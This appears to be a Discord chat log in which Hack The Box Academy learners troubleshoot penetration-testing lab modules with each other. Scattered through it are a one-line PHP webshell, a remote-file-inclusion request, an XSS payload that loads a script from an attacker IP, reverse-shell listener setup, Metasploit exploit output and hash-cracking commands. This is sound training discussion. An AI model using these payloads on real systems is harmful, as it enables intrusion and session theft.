#modules
there's a problem in windows privesc -> Interacting with Users section: the responder command given "sudo responder -wrf -v -I tun0" throws an error saying "./Responder.py: error: no such option: -r". i had to change it to something like this to work for me: "sudo responder -wrf -v -I tun0"
not sure if even my command is correct but it worked
what was it
Don't worry about it
i guess thats the first thing il ask god when i move on
"what was that thing on nov 17th 2024?"
i need help. I am on Footprinting medium. I have the credentials for sa and alex and i have tried logging into the administrator with the creds and it doesn't work. i have enumerated SMB and all of its shares that i have been able to find, I have tried enumerating rpc with no luck, i have also gained access to the machine via rdp but can't login with the creds found
i need help please**
lol
the creds should work
did you try launching the program as admin
im going insane
i mis saw letters as different letters
Is it possible to kick yourself in the head
if i saw that sooner i would've solved it in 20 minutes
Anybody done the corporate OSINT module? And if so what were ur thoughts on it
Has anyone else tried the ‘web archives’ section of the ‘Information gathering - Web edition’?
I’m really struggling to find the answers from Wayback machine. The answers for 1 and 2 (members and boxes in hackthebox.eu) are coming out wrong even though I got the webpage loaded up, and the last question for the number of pages Wikipedia had in March 2001 is impossible to say since the earliest snapshot they have is for June 2001.
Can anyone help? Thanks.
Attacking Common Applications, thick clients. Can anyone help me here?
O man this exercise just sucked. I can help you. You basically need to follow the steps from the lesson from the very beginning dont skip a step and just put the initial exe file in the debugger.
I've been stuck here for days.... 😒 The initial restart-service.exe?
It is probably because you are just getting the restart-service.exe file and opening it in the debugger. What you need to do is follow the steps. focus on this step, because it generates a new exe file that you need to import that file in the debugger.
can anyone help with linux fundamentals - filter contents? "How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)" nothing im trying is working!
in Password Attacks module, specifically in Attacking Active Directory & NTDS.dit.
I got the credentials for Question 3, but when I submit then it says wrong answer, any idea what's the problem?
try to run ss -tulnp | grep "LISTEN", see how many services are listening, it says not on localhost and ipv4 only so try to exclude any service listening on localhost and any service using IPv6.
I did not do the module but this is probably how you'd do it.
can i send my output here?
i did something similar and got the same answer so i dont really know
I'm not sure if this is against some rules or not honestly
can i send it to you?
yes you can
Had already run it, but running it again gave me the same size restart-service.exe so i guess it got be something else
Also since i got these 3 files , i guess that the steps so far are completed correctly?
Now that you have the NEW exe file go ahead and import it in the debugger
The new is the same as the old, check the files sizes
and yet nothing changed
The only map with RW is the heap and is not a DOS MZ exe
@blissful verge Gotta say, really frustrating exercise mister
@final shale Since i got these 3 files everything so far is ok
I would say yes
Nvm, finally got it. For those wondering: Use archive.ph if internet archive misbehaves, and directly change the date in the url because IA seems to redirect to June 11 2017 instead of June 10 even when you click correctly.
any help
you can dm with more details if you'd like
please don't add as friend, just DM
hey guys, need some help. I am in AD Enumeration & Attacks skills assessment part 2, question 9.
I have Administrator access to the MS01 host, and am trying to enumerate the user with GenericAll ACL
Using SharpHound, it is successful and able to find the answer. But when using PowerView it shows this error
```
At C:\Users\Administrator\Documents\PowerView.ps1:5904 char:9
+ throw '[Get-DomainGUIDMap] Error in retrieving forest schema ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OperationStopped: ([Get-DomainGUID...from Get-Forest:String) [], RuntimeException
+ FullyQualifiedErrorId : [Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest
```
Why when using PowerView, it shows this error?
Is the source code used in CSWH - Websocket , Section: https://academy.hackthebox.com/module/231/section/2489 available.
Anyone who has done 'Cracking Passwords with Hashcat' --> skill assessments last question's - I need to use rules here to determine what password appears the most?
Hey guys whats up? Can anyone help me with footprinting hard lab? I think there is something wrong with I dont know what. I have to ssh with the user tom which I have found already. I have already found the SSH key too. I copy paste the ssh key into my own file and chmod 600 on it and try to ssh but nothing. I get tom@10.129.202.20: Permission denied (publickey).
how are you trying to ssh with the key
ssh -i id_rsa_2 tom@10.129.202.20
likely something wrong with the key, would compare with what you found on the server
One thing I can find as a mistake is when I cat the file from vim or nano they have some whitespace around that I am not putting there. When I paste it it looks the same but then it changes. Maybe its that. Maybe not
You'll want to output results and figure out a way to count the number of times a hash is the same.
Yea I always get each value appears one, so either I missed some password, or the hashcat outputs every password once regardless of how many times It got cracked.
anyone help me with the first task in server side attacks: Identifying SSRF. I have obviously found the open port is 3306. But literally cannot find where to go from there. dateserver=http://dateserver.htb/javascript&date=2024-01-01 doesn't give me much when i use it with burp repeater. I have tried enumerating /javascript with ffuf but that hasn't led me anywhere
Hey, does anyone know of any Metasploit module where you just set the LHOST and LPORT, and then when you run it, it generates a powershell reverse_tcp payload for you to copy and execute on the target machine? I forgot the name of the module 💀
anyone here
msfvenom
Nah, that's to generate payloads. I'd seen the thing I'm talking about in a video, but that video was taken down 💀
It's a module and gives you the payload command to run, and then connects once you run the command in the same pane.
Also, anyone know what's wrong with my SMB map?
I am working on:
Explore the web application to identify other fields/forms that only apply front-end validation, and try to find one that suffers from 'Validation Logic Disparity'.
Then, after abusing it to obtain UNLIMITED cubes, unlock the "Intro to Academy" module and submit the flag in the first section.
How do we see the front-end validation?
How do we see the back-end validation?
In the source code I saw that if a user login with @hackthebox.com it gets UNLIMITED, but we are not allowed to change email in profile settings:
code: users-controllers.js:
// disable registering with @hackthebox.com domain
if (email.endsWith("@hackthebox.com")) {
return next({
message: "Registration with @hackthebox.com email is not allowed.",
statusCode: 422,
});
}
Can someone help me with this?
it is about what hashes you crack and the format of it.. I have sent you a DM, if you don't have solve it ...
You can do it here https://www.revshells.com/
It is a good one!
Yeah, that's what I usually use, but I was hunting for that module specifically, just to satisfy my mind 😂
I'm trying to establish a reverse shell, got a listener set up on port 4445, but ligolo is returning this when I execute the payload. Anyone know how to resolve this?
ERRO[0715] dial tcp 0.0.0.0:4445: connect: connection refused
I've already tried different listener and proxy ports. File transfers work, it's just when I'm trying to connect back to the multi/handler Metasploit listener when executing my payload.
I'm confused, but setting my LHOST on the listener to my pivot host's IP address instead of my attack host's IP address worked? Why?
Setting the LHOST to 0.0.0.0 works too, but that makes sense since it means any IP address.
What are the certs required for doing a job as a Pentester in the US?
And what is the salary I can expect?
working through the credential hunting in windows section of the password attacks module. i found the first two via some windows searches, but upon trying to run the third party tool suggested in the module i get a notice that says "this app cant run on your pc"
am i doing something wrong here? i tried a few versions of the exe from the github releases page and none seem to work
0.0.0.0 will listen to all your ips /interface in your local host
Nvm, i did misunderstand you
Just... Watch out for trying it under WSL in Windows
While you can route over the VPN, you cannot bind to your VPN client IP within it by default
Might be a way to do it.. will have a browse
I mean, you could connect to the VPN from within WSL
But I'm talking of if you have OpenVPN connected on your Windows host, and try listening for a callback from within WSL
@ocean night you are from HTB? several times had problems with connecting via reverse shell on targets in different modules. in some cases it doesn't work, others don't, heard others with dust problems, seems to be npgot when we run via vpn from our own machines this happens, is it a known problem?
I am, but I can't generally provide support regarding content I'm afraid
If it's regarding the most recent machine, there was an issue, and an initial patch has gone out for it recently
Och i see.. it was about different machines on different days.. thanx anyway
It looks like you might be able to expose your VPN IP from Windows to WSL with some routing and forwarding enabled
but tbh.. if you want to use the VPN from within WSL, just use the client from within WSL 😅
can someone explain this?
Looks like a GR character set? maybe?
Dont get it, what even use wsl at all, use a vm or just install some distro.. 🙂
I love WSL 🙂
i have given an encoded text and i need to decode it
Change to the decode tab?
i think its first encoded with base64 then url
Ppl are different 😄
yeah i was doing that
first i decoded it to base64 and then url decode but the url decode is same as base64 after first decode
i dont get it
tried multiple times
How did you decode ?
Read the question @eager zinc
The hint you need is there
It's a Tier 2 module mind, so no solutions here please 😉
yeah sry but idk why im unable to understand the hint
You're close
Dont give up:)
YESSSS! xfreerdp is not working!!!! However, rdesktop with specifying local domain worked. Thanks so much guys!!!!!👍
fixed
i think url decoding didnt work in zep
Look at the difference between a URL encoded string, and a Base64 encoded string
You got this
Bumping this question.
Just wondering if you need to be in UNI to get the student plan on htb academy?
Would High school/middle school qualify?
https://help.hackthebox.com/en/articles/7973133-getting-the-student-subscription
you can reach out to support for clarification
gotcha fs fs
how do you get cpts in middle school
wow you must be really smart
do you know how to get bridged network for wsl?
by being a grinder 🤑🤑🤑🤑🤑🤑🤑🤑
sigma grinding
No I was just asking for someone else 😭
Anyone available for #modules message
do you mean to get student pricing?
Nah I was asking if a highschooler/middle schooler is able to get the student plan for someone else thats all 🙂
i'd think the status of the person signing up at the time is what counts. If you're a student but you want to get student pricing for your dad, probably not a thing...if i'm understanding what you're asking correctly
damn bro just exposed himself
I think, however, that he meant that he asked for someone else, not that someone else should get it through him
Just Google:)
You could try web_delivery 😉 it's one of my favorites. In this example I am using a meterpreter payload, but I'm pretty sure your payload would work too
PDF web application in Final Assessment of Modern Web Exploitation Techniques module is not working properly.
Even while following the steps mentioned in Explanation I am getting Internal server error
Is the htb academy where I can start learning about black box? Im most likely going to have a black box test pretty soon and I need to learn about it ASAP, but I dont really know where to start
a test? like an exam?
Yeah a really important one
i'm in Intro to Network Traffic Analysis, Page 11, Familiarity With Wireshark. I've downloaded the pcap and opened it within Wireshark. I get this message when i click on any of the interfaces from the home screen, not to mention env3 is never mentioned in the modules, usually eth0 or something else
well if you dont have prior knowledge im guessing it'll be an easy one
do a couple of htb boxes and you're good
Not at all
hows that
Its not for school and I know a ton of terms, but I have never actually put it into action
thats why im recommending htb boxes
easy ones
i dont do boxes myself but ig you'll do great, follow the writeups you find while googling
👍
alr ill try, ty
$ tcpdump -i ens3
tcpdump: ens3: You don't have permission to perform this capture on that device
(socket: Operation not permitted)
Attacking Common Applications
Exploiting web vulnerabilities in thick client applications
So...I modified the Invoker and the ClientGUI thingy, compiled it and made the traverse jar, instead of doing it 1 by 1 and taking time.
For some reason, the .jar displays the content of the file instead of downloading it. I have used the 1:1 script provided in the module, anyone got an idea what could be the issue?
If someone is down, I can even stream my actions 1 by 1 to see what's wrong, but I am stuck for about 2+ weeks on that.
dang DACL Attacks II Skill Assessment was a rough one. Finally got through it. Took me longer than all the other Skill Assessments in the new path
run as root
when i'm in the wireshark gui, i get the same permissions error, any idea what i can do there similar to how i can use sudo on the command line?
if that question is incoherent thats because i just got here 🙂
launch wireshark as root
when i'm in the pwnbox, i click the icon to open the wireshark gui, how would i open that as root? is there a way through the command line to start up the gui as root?
sudo wireshark
in terminal
$ sudo wireshark
Authorization required, but no authorization protocol specified
** (wireshark:128356) 16:29:36.665846 [GUI WARNING] -- could not connect to display :1
** (wireshark:128356) 16:29:36.666008 [GUI ERROR] -- This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.
Available platform plugins are: eglfs, linuxfb, minimal, minimalegl, offscreen, vnc, wayland-egl, wayland, wayland-xcomposite-egl, wayland-xcomposite-glx, xcb.
Aborted
😢
$ wireshark does open the program
strange
ig wireshark wants access to your users display
but since you’re using sudo the root user doesn’t have access to your root environment
might be wrong
this is my first time using wireshark so all foreign to me, i'm in the Intro to Network Traffic Analysis module
you need to let the root user have access to your display
chat gpt
xhost +SI:localuser:root
localuser:root being added to access control list
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-fp9v5lwpgr]─[~]
└──╼ [★]$ sudo -i
root@htb-fp9v5lwpgr:~# sudo wireshark
** (wireshark:136568) 16:34:46.519097 [GUI WARNING] -- QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
This did open wireshark
but i get the feeling i did a weird workaround to get it to work
still getting the "do not have permissions to capture" messages
no
when you’re using a computer with a gui the windows that appear on your display is controlled by something called the x server
in linux this display is referred to by an identifier :0 :1 and it’s the environment applications draw their interfaces
so when you run a gui app it needs to talk to this display to know where to put all its pretty pictures
and when you slap sudo on a command you’re switching users from you (who has access to the display) to root who doesn’t because root doesn’t inherit your environmental variables unless explicitly told to do so
interesting
so wireshark running as root fails to find a display to connect to and fails, the result in the above error you sent
is xhost +SI:localuser:root something i will be using often in the future?
or is there another way to give root the environment
if you’re running gui apps with sudo which you really shouldn’t then yes you would have to deal with this every time because sudo doesnt preserve display access unless you explicitly configure it to
yes
earlier you seemed surprised that I had to even do this, is there something i might've done to cause this? maybe a reset of the machine would help?
try this sudo -E wireshark
that worked, no more error messages
also whenever i start up a new Pwnbox, i like to make this adjustment to the shortcut:
i think part of my struggle was, once i followed instructions to SSH into a target, i wondered how i got the wireshark on my local machine to work on the machine I just entered. Only now realized i had to start wireshark inside the target
now i see the ENS224 i didn't see earlier, had only seen ens3
yes the -E flag
preserves env vars
this will stop sudo from creating a bridge between root user and normal user
Hi everyone!
Sorry that I'm messaging there, now I'm reviewing pro lab and making writeup for myself Pro Lab (Rastalabs) I logged in with credentials ||rastalabs\S......r2020 ||to OWA but now when I try with this I have an error can you please refer me what I would do?
#welcome verify your acc
Then ask in the correct channel
@west canopy You were actually correct. From home I had no issue, but from work the issue persisted (which was weird as it was outgoing requests not incoming ones). Thank you very much for this 🙂
ah that makes sense. Many companies use proxies for outbound traffic.
Is there a problem with the first web enumeration module that uses: https://www.inlanefreight.com/ on 10.10.10.121? Using the web based workstation the site doesn't load when browsing via the internal IP. The DNS settings are 1.1.1.1 and 8.8.8.8. If anyone has got any ideas I would be grateful. I did the IP to the hosts file to see if that would work unfortunately it did not. This relates to this module: https://academy.hackthebox.com/module/77/section/728
Scroll down to the bottom of that section and the target IP:PORT will be provided after you click on "Click here to spawn the target system!". Also inlanefreight.com is reachable from a browser and does not use 10.10.10.121.
Thank you. I was following the initial instructions where 10.10.10.121 was used. That is why I expected to be able to browse to it from the box. After the target was spawned I can get to the HTB blog page.
Hello, is that normal that ffuf takes a while when performing subdomain & vhost brute forcing (on inlanefreight.com & academy.htb for the Attacking Web Applications with Ffuf module)
yes
but why ? When I do the questions with gobuster and wfuzz which I prefer, it is really fast
no. took me 249ms to finish vhost enum with ffuf.
Yes I finally manage to solve it. The issue was coming from my network I guess. Thank you
LLMNR/NBT-NS Poisoning - from Linux module question: Crack the hash for the previous account and submit the cleartext password as your answer. I am having issues cracking with hashcat and/or John. I use -m 5600 but still get either hashcat not found or separator unmatched. I used the hash for the user from 1st question. I tried from my terminal and academy terminal as well. Any guidance would be appreciated for this one.
I have a zip file,named flag.zip
It has a png file named what's this.png and a flag.txt
hashcat not found? how are you running it? sounds like it's not installed. if you're running it from a folder use .\hashcat.exe instead of just typing hashcat
How to open it 
sorry, not hashcat, hash not found
No hints
you run hashcat and instead of hashcat running it says "hash not found"? verbatim what does it say
unzip it?
it has password
This question has three levels. The first level is dictionary blasting, and the second level is mask attack. I am stuck at the last level.
there is no hints
would really help if you mentioned the module and section
otherwise i'd say crack it
just ran it again. i didnt have a file path right, but..i still get errors.: Watchdog: Temperature abort trigger set to 90c
clCompileProgram(): CL_COMPILE_PROGRAM_FAILURE
error: unknown target CPU 'generic'
- Device #1: Kernel /usr/local/share/hashcat/OpenCL/shared.cl build failed.
There are 'What's this.png' and a'flag.txt' in zip
Hey guys!
https://academy.hackthebox.com/module/54/section/490
I have added the IP to my /etc/hosts file. When I browse through academy.htb:port, i can see the response. But, when I do admin.academy.htb:port it's going into load mode forever.
Did you add the subdomain to your hosts file?
no, let me do that
are you using cpu or gpu cracking? maybe try it in Windows with the Windows version of hashcat. it's not recognizing your CPU.
thank you
https://www.kali.org/docs/general-use/install-nvidia-drivers-on-kali-linux/ or you can install the CUDA cores on Windows and do it with your GPU there
Thanks. I'll look into this and keep pushing.
Bruh the skill assessment for ffuf module takes lot of times to properly perform the fuzzing it's crazy you didn't joke with this one
i think i ran like 3-5 ffuf processes to make it go faster
iirc ffuf supports threads
you can also use feroxbuster and gobuster
i love feroxbuster.. but they're on the attacking with ffuf module so.. probably should use ffuf haha.
I think this might be it. I must've just configured it incorrectly when I tried the payload yesterday. Thanks!
yeah I found it on 0xdf writeups ,ffuf can do the job tho
hello everyone i need some help with the encoding/decoding part of the web proxies module https://academy.hackthebox.com/module/110/section/1052, the hint says use base64 and url encoding, i've tried that, and the reverse order. Didnt work. Am i missing something?
Downloaded the file and it is just what the hint suggests.
Something to keep in mind is you can encode something with the same encoding multiple times. Play around with it or if you know of a swiss army knife, use it.
thanks, i figured it out with this
solution was pretty crazy tho. if it wasnt for the hint i might have never figured it out. I assume by the swiss army knife you mean the smart decoder in burpsuite? I tried using it but it didnt do anything
My hint was not within Burp.
gotcha
You can DM and I will tell you what to check out.
I am in the same boat. Any hints on what we are missing? The root flag is not working.
I got stuck in windows lateral movement module , winrm section
Im at the last part where i have to get connect to dc01 as leonvqz used and get the flag
I rdp using pth with user leonvqz on srv02 but not able to pssession on dc01
“Completed”
is the script for xss session hijacking correct?
tried redoing it a few times
or am i missing something obvious
that's not a script but you're running a php server, looks like the server worked
yeah thats the output
so module is meant to walk you through session hijacking with xss script
im trying it on local vm to see if it's a pwnbox thing atm
what module and section
Cross-Site Scripting (XSS)
Session Hijacking
i presumed their script would have worked, but getting that unsupported ssl request error
your php command is correct, not sure what you're doing on the other end
||<script src=http://IP:8000/script.js></script>||
thats what im running in the fields
tough to say without knowing more.. make sure your payloads are right and the contents of script.js it should work
Hello everyone! I'm having a little trouble with the Metasploit Module.
```
[*] 10.129.174.211:445 - Target OS: Windows Server 2016 Standard 14393
[*] 10.129.174.211:445 - Built a write-what-where primitive...
[+] 10.129.174.211:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.129.174.211:445 - Selecting PowerShell target
[*] 10.129.174.211:445 - Executing the payload...
[+] 10.129.174.211:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.
```
Can I edit the timeout?
make sure you have configured your listening host address correctly
your LHOST is wrong
I'm supposed to set the LHOST as my own IP which I can check with ifconfig, yes?
AAAAAH
theres a tiny mistake in the Creepy Crawlies module the wget command -0 doesn't exist cause its actually a capital O
Now answer me this? Why am I not smart?
Not knowing something doesn't mean you're not smart. You're smart enough to know that you don't know something and have room for improvement.
😩
I think you are smart, you have been learning about hard stuff, i think you are young, it takes time to get knowledge, things like this is not easy! You will get it, i promise!
Maybe try with different wordlists or add some rules/mask in your enumeration
My bro I'm 33, I think I'm just mentally challenged hahahaha
But I like learning at least
@night hollow this is not a channel/server to sell stuff.
Best to ask in #careers-and-certs , if you can't access this channel, read #welcome and follow instructions
Hehe, sorry Bro! 🙂
Hi, I am unable to connect using SSH in the following question. It's from Intro to Command Line Module. I am using the password from the previous question but it gives me error of 'permission denied'. Am I doing something wrong? Thanks.
Don’t run kali as root
And why are you using sshpass? Just use ssh
ssh user9@10.129.204.9
I know what I am doing. Don't worry.
It's not getting in the way. The problem is something else. Have tried with only ssh too but same error. It's just personal preference to use sshpass.
Clearly not lol
If you have nothing better to add please stop talking. You're not helping at all.
It says there’s no password
i want to set payload processing to hex encode, but its not there?
tried that already, even reset the machine.
Are you connected to the vpn?
You can laugh but there’s plenty of people that don’t do that and then wonder why it doesn’t work
he is indeed connected to the VPN as otherwise the SSH connection banner won't be shown
however, he also needs to carefully revisit the details in the question
To me it seems he tries to connect using user8 and a pass
While he needs user9 with no pass
the passwords for the users are intentionally left out in the questions as it is part of the assessment to be found
Ah I see
Am not familiar with the module
You find it in the section before, and then get to the next or something?
You gradually find the passwords for the next user by solving the questions
Your user is "user8" and in the question they say "user9"
Maybe it is that
I see, so he isn’t at user9 yet?
that's the thing, he needs to carefully go through the question and the details it has
So, it means I need to find out the password for user9 using user8 apparently.
but in the previous questions I have been using the flags as the passwords and the hint was the same as " " and they worked. Maybe it's different in this question.
For example, in this question, I used the user7 flag for user8 even though password is " ". So I was following the same pattern but it didn't work for user9.
take a break and try again
I don't know where exactly to ask this question so I'll just ask here.
anyone knows when will Season 7 start?
Hello everyone! Can someone help me with graphql skill assessment!! I find usernames, id, apikeys, but not flag. I'm stuck
try to locate a vulnerability within one of the functionalities
how important is the footprinting module?
Thank you, I actually found the vuln and I found flag at last very fun module
Trying to import SeBackUpModule for this module section(https://academy.hackthebox.com/module/67/section/601)
But it isn't working for me(unlike in the module section lecture)
I ran as administrator in Powershell too:
```
- Import-Module .\SeBackupPrivilegeUtils.dll
-
+ CategoryInfo : ResourceUnavailable: (.\SeBackupPrivilegeUtils.dll:String) [Import-Module], FileNotFoundException
+ FullyQualifiedErrorId : Modules_ModuleNotFound,Microsoft.PowerShell.Commands.ImportModuleCommand
PS C:\Users\Administrator> whoami /priv

PRIVILEGES INFORMATION

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\Administrator> Set-SeBackupPrivilege
Set-SeBackupPrivilege : The term 'Set-SeBackupPrivilege' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
- Set-SeBackupPrivilege
-
+ CategoryInfo : ObjectNotFound: (Set-SeBackupPrivilege:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundExce
```
file not found
I see now I need to be in the tools directory:
```
PS C:\> Get-ChildItem -Path C:\ -Recurse -Filter SeBackupPrivilegeUtils.dll -ErrorAction SilentlyContinue

    Directory: C:\Tools

Mode    LastWriteTime      Length Name
-a----  5/6/2021 12:54 PM  16384  SeBackupPrivilegeUtils.dll
```
Or use the full filepath
Hello everyone, I have a problem using nmap and was wondering if someone has an explanation. I am doing a module and in the module there are multiple boxes, I am using nmap to sweep ping the network through a ligolo-ng proxy.
For some reason if I use nmap -PE -sn 172.16.1.11 or nmap -PE -sn 172.16.1.13, nmap tells me that the hosts are up, but if I try nmap -PE -sn 172.16.1.1-15 it tells me that 0 host is up.
I dont understand why is that.
i believe that on the ligolo-ng page caveats section there is a warning about nmap like false positives
hmmm just reading your question again
you seem to be pinging different hosts
im coming back to this question just to answer my concern
picture at the bottom
This image also shows an example of several GPOs being linked to the Corp OU. When more than one GPO is linked to an OU, they are processed based on the Link Order. The GPO with the lowest Link Order is processed last, or the GPO with link order 1 has the highest precedence, then 2, and 3, and so on. So in our example above, the Disallow LM Hash GPO will have precedence over the Block Removable Media and Disable Guest Account GPOs, meaning it will be processed first.
My question i have is at the end of the line it says "meaning it will be processed first" if this is referring to the Disallow LM Hash GPO it wouldnt make sense since this has link order 1 (highest precedence) but if "meaning it will be processed first" is referring to Block Removable Media and Disable Guest Account GPOs it makes sense.
sorry words are confusing but question is "meaning it will be processed first" is referring to what group policy?
from my understanding its:
Disable Guest Account -> Block Removable Media -> Disallow LM Hash (with this GPO potentially override settings)
can you please provide the module ? I am curious about that behaviour too and would like to run some tests when I get to it
actually this does seem odd
Sure, here it is : https://academy.hackthebox.com/module/115/section/1139
If you add -vv or --packet-trace iirc you should see the packets sent
I saw the warning that is why I am using -PE
Could try that you are right, gonna test it.
if you figure it out and can spare the time, please let us know, still curious
any help here please?
Hi I'm stuck in RFI in the File Inclusion Module. I've created the php shell and started an upload server in the same directory. After including my IP address and command I get the following error message:
<b>Notice</b>: Undefined index: cmd in <b>http://10.10.14.3/shell.php?cmd=id</b> on line <b>1</b><br />
<br />
<b>Warning</b>: system(): Cannot execute a blank command in <b>http://10.10.14.3/shell.php?cmd=id</b> on line <b>1</b><br />
<br />
<b>Notice</b>: Undefined variable: p2 in <b>/var/www/html/index.php</b> on line <b>48</b><br />
Here you can see that the shell is accessed:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.231.123 - - [19/Nov/2024 15:17:30] "GET /shell.php?cmd=id HTTP/1.0" 200 -
command should be in url?
It's in the error. You're using some undefined p2 variable in your file (I guess). Check your included code
It's referring to disallowing the lm hash
Ordering is top-down
It's literally a basic php webshell:
<?php system($_GET["cmd"]); ?>
doesnt highest precedence mean processed last?
a GPO attached to a specific OU would have "precedence over" a GPO attached at the domain level because it will be processed last and could run the risk of overriding settings in a GPO higher up in the domain hierarchy.
whats the file name is it shell.php or shell.php?cmd=id
shell.php
That's referring to something else
Disable Guest Account -> Block Removable Media -> Disallow LM Hash (with this GPO potentially override settings)
is this correct tho 
No
okay understood its the other way around
Ok nvm i got it
i can vc and we can do it need a break anyways
have to use & instead of ?
ayt all good
thanks for your help
The "precedence" in quotes is just to say the more specific it has to be, the later it will be processed
Just to make it clear the GPO with the highest precedence in a tree will be the one at the last OU.
but when it comes to multiple GPO in a OU then its like a firewall rule link order 1 is done first link order 2 then 3 so basically this
Disable Guest Account -> Block Removable Media -> Disallow LM Hash (with this GPO potentially override settings)
is actually the opposite with Disable Guest Account overriding the settings?
am i correct?
Yes

Hi all,
I’m preparing for the CPTS exam, and I have a question about reporting. Suppose I encounter an FTP anonymous login, but there are no files present. Would this still be considered a finding? If so, would it be categorized as low or informational? When I use the CVSS 3.1 calculator, I get a score of 0.0, which would suggest it’s informational, but in the course, they mention it as low. What do you all think?
You'll need to use best judgement
Because it depends what's accessible via login
Hi ! I'm having trouble figuring out DNS's in Footprinting - DNS Enumeration. I kinda understand zone transfering, and records, configurations. However, i'm lost when it comes to enumeration. Let's say dig's axfr returns 5 A records. One of them is also axfr-able. When automating this process with gobuster for example, it finds 3 out of 5 A records, and seemingly not the axfr-able one.
I've been reading the module up and down, and can't figure out the relationship of zones. Some seems unscannable, or unreachable. Do you have material that can help me have a grasp on this ?
In this case it was only a flag and nothing that got me into the network or other useful information
Thanks didn't see that one :))
Hey everyone, I am on module/77/section/843, I ran nmap and found the target box is running an outdated version of Apache, found multiple vulnerabilities in Searchsploit, but how do you turn Searchsploit results into a Metasploit attack?
In msfconsole search apache 2.4.41
Maybe?
Idk it also helps to give module and section name
Not the endpoint
Because I'm on mobile so copy/paste the endpoint is difficult
Module "Getting Started" section "Public Exploits"
the instructions just tell you to go to msfconsole "search exploit eternalblue"
I've narrowed down my initial questions about DNS records and zones. dig axfr finds 5 A records, gobuster enumeration finds 3 (with curated wordlist). How can a DNS A record be invisible to gobuster ?
There's a simple-backup directory but it's empty
Use that as a narrow focus for your search
The plugin name is right there to search for
ah found something on rapid7, thx
Are all 5 names in the word list?
on nmap course it says -sn disables port scanning, y woud u wan do that
If you're scanning for active hosts
so u can only do one or another? not both?
oh true
does it also make u more traceable?
Lmao if that's what you're worried about gtfo xD
Packets need to be sent and received for nmap to give results
Yes. Also the only two that gobuster finds are on the same subnets. The A records to find are on other subnets (based from dig axfr's)
In the same subnet?
Can i disclose IPs of the module ?
sure
Dig's axfr
app.inlanefreight.htb. 604800 IN A 10.129.18.15
dev.inlanefreight.htb. 604800 IN A 10.12.0.1
internal.inlanefreight.htb. 604800 IN A 10.129.1.6
mail1.inlanefreight.htb. 604800 IN A 10.129.18.201
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
Gobuster
Found: ns.inlanefreight.htb [127.0.0.1]
Found: app.inlanefreight.htb [10.129.18.15]
Found: mail1.inlanefreight.htb [10.129.18.201]
y
just wanted to let you know that i was right about
Disable Guest Account -> Block Removable Media -> Disallow LM Hash (with this GPO potentially override settings)
and its not the otherway around meaning link order 1 is applied last and will override
Learn how to check the Group Policy processing order. In this example, I show you how to work out the order in which group policies process the policies and which policies take precedent over conflicting policies.
Hi, I’m Danny, a London based IT consultant and blogger. You can view all my blog posts at: https://www.dannymoran.com
I don't know exactly what GoBuster does for a query, but the result is correct from my point of view
Seems like Gobuster can't find anything if I make it start fuzzing from this very invisible zone. Do you know some robust tool that can enumerate zones and query axfr and the same time iterating through "leaves" ? Thanks anyway for the help appreciate it :))
If a zone transfer works, why do you want to use other tools? If the zone transfer works, you will get all the data
There's also specific tools for dns bruteforcing
Manual enumeration works fine for zone transfers but I think I need automation to scan for subzones/subdomains to find a specific host. I was asking this because from my point of view gobuster cannot find a particular zone
i'll have a look and test them all haha :))
You'll get introduced to them in the modules
who can help me in nmap
Remember that zones can and should be configured so that only certain servers are allowed to transfer zones
so i did ssh root@ <ip> on nmap and it asked me to continue
i typed yes and now its tripping
i'll hold on to this thanks
is there a network issue today? I have been running through the skills assessments on attacking common services, nmap scans have been taking longer than usual and on the attacking smtp I had to restart the box to get the telnet to connect? on the hard lab my nmap is currently at about 40 minutes
Attacking Common Applications - SA 2 - Last question Find the flag.
Got the rev shell as www-data but have trouble with priv esc, any tips?
Tried all the exploits suggested from local_exploit_suggester, nothing worked.
sudo -l give me no passwd for php but after launching bash i still am www-data
Any tips??
I think I went a different way to you, there are multiple ways from what I can see in the forums are you asking about the medium one or hard just to clarify?
Medium one
ignore me, I am on different module my bad I am on attacking common services. sorry., but maybe try gtfobins? if you havent already
Hi Ive been following the steps outlined in this module section (https://academy.hackthebox.com/module/67/section/603) and I cant understand why I continue to get this access denied error:
The question: " Leverage membership in the DnsAdmins group to escalate privileges. Submit the contents of the flag located at c:\Users\Administrator\Desktop\DnsAdmins\flag.txt"
@fathom pendant care giving a hand?
Hi I’m new to cybersecurity and I have no sort of idea where to even start what would be the best way for me to start with no previous knowledge
Have you joined the Academy? If not, do it and do the modules in the beginning path.. it is good to have some basics in Networking, Linux, Windows (command-line / terminal); some knowledge about scripting with bash and python is good for you too
do i need to know all that before doing the modules
are you up for a DM on the Easy lab for the same module? I just got the flag one way and I'm curious what I'm missing for the other way
You have the sudo -l telling you what you can run with sudo
Nah it wasnt that
Just the right find command
Cause who would have thought that you should not search for flag, rather "*flag.txt"
Where the f is that file now...
or anyone for that matter - if you've completed the Easy lab of Attacking Common Services, I would appreciate a nudge about the alternative way of getting the same flag
Hi guys
I'm currently going through this module https://academy.hackthebox.com/module/176/section/1778
I'm supposed to use this command hashcat -m 13100 -a 0 spn.txt passwords.txt --outfile="cracked.txt"
Where do I get the **password.txt** file from?
hi guys, i have a target and task
After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.
